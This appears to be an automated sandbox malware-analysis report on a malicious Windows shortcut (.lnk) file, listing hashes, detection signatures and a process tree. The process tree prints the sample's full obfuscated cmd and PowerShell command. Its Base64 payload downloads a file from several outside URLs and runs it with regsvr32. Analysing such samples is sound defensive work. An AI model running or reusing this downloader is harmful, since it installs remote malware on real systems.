Analysis

  • max time kernel
    122s
  • max time network
    129s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
  • submitted
    13-11-2024 21:38

General

  • Target

    ac680c9da9b99915da3aeac996d04431b21227f59d55288fac95a8038ba4532b.lnk

  • Size

    2KB

  • MD5

    e567fd6bd2ad541ea7cff36788a1cb04

  • SHA1

    335983d1da7118026ec9cb6befd1cbd3a84edf9b

  • SHA256

    ac680c9da9b99915da3aeac996d04431b21227f59d55288fac95a8038ba4532b

  • SHA512

    fba256493c808dfae95cac6282f23ec756ce1d6b9ee7fe3ad8f70d43dce4569a3830467c4d30d6d2fac8479497a819c186a997b70ce84ab444f66bc4334cf67c

Score
6/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\ac680c9da9b99915da3aeac996d04431b21227f59d55288fac95a8038ba4532b.lnk
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2368
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /v:on /c Vy+KY28nm8jrFR/pN6hHEEnR9ZQSXCM52YkkW9kA5wMTB3nmG+JcpYgkGoLMzE+MnYyHqio9||goto&p^o^w^e^r^s^h^e^l^l.e^x^e -c "&{$xW='ICAgICAgV3JpdGUtSG9zdCAiclRnU0UiOyRQcm9ncmVzc1ByZWZlcmVuY2U9IlNpbGVudGx5Q29udGludWUiOyRsaW5rcz0oImh0dHA6Ly9tYXN0ZXJmbGl4LmNvbS9PdmVydmlldy9RQTRTRTBEeENDRlM1VzhueEcvIiwiaHR0cDovL21hc3l1ay5jb20vNTgxdm95emUvQ1MvIiwiaHR0cDovL2xla2Fya2l2ZXQuc2UvaW5jbHVkZXMvbENZejNPMDdEMENtQVMvIiwiaHR0cDovL21hcnR5ci5kay94Mmhka2o1ZS8iLCJodHRwOi8vbWFydGluZ3JhbnQuY29tL2NnaS1iaW4veFJKWTEvIiwiaHR0cDovL2xlbW9uY2luZS5jb20vY3NzL2xqSXl5SEZ0dDZHSE9WZHdsSmIvIiwiaHR0cDovL21hbmRvbS5jby5pZC9hc3NldHMvZWpldnc4MktKNlZZRHpaWTNPLyIpOyR0PSJJd25NcyI7JGQ9IiRlbnY6VE1QXC4uXCR0Ijtta2RpciAtZm9yY2UgJGQgfCBvdXQtbnVsbDtmb3JlYWNoICgkdSBpbiAkbGlua3MpIHt0cnkge0lXUiAkdSAtT3V0RmlsZSAkZFxjSEtFc3RqaGZKLnVERDtSZWdzdnIzMi5leGUgIiRkXGNIS0VzdGpoZkoudUREIjticmVha30gY2F0Y2ggeyB9fQ==';$Ma=[System.Convert]::FromBase64String($xW);$Hw=[System.Text.Encoding]::ASCII.GetString($Ma); iex ($Hw)}"
      2⤵
      • An obfuscated cmd.exe command-line is typically used to evade detection.
      • Suspicious use of WriteProcessMemory
      PID:2424
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -c "&{$xW='ICAgICAgV3JpdGUtSG9zdCAiclRnU0UiOyRQcm9ncmVzc1ByZWZlcmVuY2U9IlNpbGVudGx5Q29udGludWUiOyRsaW5rcz0oImh0dHA6Ly9tYXN0ZXJmbGl4LmNvbS9PdmVydmlldy9RQTRTRTBEeENDRlM1VzhueEcvIiwiaHR0cDovL21hc3l1ay5jb20vNTgxdm95emUvQ1MvIiwiaHR0cDovL2xla2Fya2l2ZXQuc2UvaW5jbHVkZXMvbENZejNPMDdEMENtQVMvIiwiaHR0cDovL21hcnR5ci5kay94Mmhka2o1ZS8iLCJodHRwOi8vbWFydGluZ3JhbnQuY29tL2NnaS1iaW4veFJKWTEvIiwiaHR0cDovL2xlbW9uY2luZS5jb20vY3NzL2xqSXl5SEZ0dDZHSE9WZHdsSmIvIiwiaHR0cDovL21hbmRvbS5jby5pZC9hc3NldHMvZWpldnc4MktKNlZZRHpaWTNPLyIpOyR0PSJJd25NcyI7JGQ9IiRlbnY6VE1QXC4uXCR0Ijtta2RpciAtZm9yY2UgJGQgfCBvdXQtbnVsbDtmb3JlYWNoICgkdSBpbiAkbGlua3MpIHt0cnkge0lXUiAkdSAtT3V0RmlsZSAkZFxjSEtFc3RqaGZKLnVERDtSZWdzdnIzMi5leGUgIiRkXGNIS0VzdGpoZkoudUREIjticmVha30gY2F0Y2ggeyB9fQ==';$Ma=[System.Convert]::FromBase64String($xW);$Hw=[System.Text.Encoding]::ASCII.GetString($Ma); iex ($Hw)}"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2532

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2532-40-0x000007FEF595E000-0x000007FEF595F000-memory.dmp

    Filesize

    4KB

  • memory/2532-41-0x000007FEF56A0000-0x000007FEF603D000-memory.dmp

    Filesize

    9.6MB

  • memory/2532-42-0x000000001B120000-0x000000001B402000-memory.dmp

    Filesize

    2.9MB

  • memory/2532-44-0x000007FEF56A0000-0x000007FEF603D000-memory.dmp

    Filesize

    9.6MB

  • memory/2532-43-0x0000000002490000-0x0000000002498000-memory.dmp

    Filesize

    32KB

  • memory/2532-45-0x000007FEF56A0000-0x000007FEF603D000-memory.dmp

    Filesize

    9.6MB

  • memory/2532-46-0x000007FEF56A0000-0x000007FEF603D000-memory.dmp

    Filesize

    9.6MB